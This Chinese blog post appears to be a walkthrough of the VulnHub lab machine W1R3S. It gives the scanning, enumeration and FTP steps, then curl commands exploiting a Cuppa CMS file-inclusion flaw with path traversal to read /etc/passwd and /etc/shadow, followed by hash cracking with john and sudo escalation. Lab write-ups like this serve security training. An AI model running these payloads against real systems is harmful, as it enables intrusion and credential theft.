渗透项目(五):W1R3S

项目地址:W1R3S: 1.0.1 ~ VulnHub

1、W1R3S的考察点:

1)信息收集:

1、nmap挖掘信息。2、页面枚举。3、Cuppa CMS LFI

2)提权:

1、sudo提权

2、渗透过程:

1)、将下载好的靶机解压到VMware中打开。

2)、打开kali,查看本机ip地址,同时查看同网段的地址输入:

ifconfig     #查看到ip地址为192.168.188.128

nmap -sP 192.168.188.1/24     #查看同网段存活的主机

发现靶机192.168.188.131

3)对靶机进行信息收集,输入:

nmap -p- 192.168.188.131   #收集靶机开放的端口

nmap 192.168.188.131 -sS -sV -A  -T5   #收集靶机具体的端口以及底层的信息 

发现有21、22、80、3306端口,所以可以想到21端口是否存在未授权登录,像渗透项目四一样,可以匿名登录。22端口可能存在ssh爆破。80端口的web服务可能出现一些web漏洞可以利用等等。

 用nmap挖掘到了更多的信息,这里ftp可以进行未授权访问,输入:

ftp 192.168.188.131   #进行anonymous访问,用户名是anonymous,密码随便或者直接回车。

dir    #发现有三个文件夹

利用get 依次将其下载到kali本地

下载到本地后依次打开,发现并没有什么有用的东西。

4)对22端口爆破,没有详细的信息没办法生成特别管用的密码文件,也没有爆破出来。然后去查看80端口的web服务,浏览器输入靶机ip地址,发现是个apache的主页。再没什么信息发现。

 5)下面就可以用dirb对网站进行枚举,输入:

dirb http://192.168.188.131/

发现了这样的路径,输入该路径发现这是一个Cuppa CMS框架

也可以输入    来查看是什么框架

whatweb http://192.168.188.131/administrator/installation/

6)搜索Cuppa CMS 的exploit,发现了id号为 25971 

这是一个文件包含漏洞。可以在kali本地输入:

searchsploit 25971   #查找漏洞

然后就之前的统一操作,locate然后cp到/home/kali,然后打开文件查看该exploit怎么使用

这里将里面的target改为靶机地址,然后在浏览器输入:

发现没有什么东西输出,url里是get请求,猜测应该是需要post请求。

在终端输入curl --help查看,curl是一个发送请求的命令

curl --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.188.131/administrator/alerts/alertConfigField.php 

发现了一个用户,然后输入:

curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.188.131/administrator/alerts/alertConfigField.php 

将这一长串,复制到一个txt文档中,利用john去破解

破解出来用户是w1r3s,密码是computer

7)利用ssh去远程登录下靶机,输入:

ssh w1r3s@192.168.188.131

8)利用sudo提权,知道了密码,直接sudo提权,然后进入根目录,就发现了flag文件。

 本次渗透就此完成!

后续会具体的学习文件包含漏洞!继续加油~继续努力~ 

  • 5
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值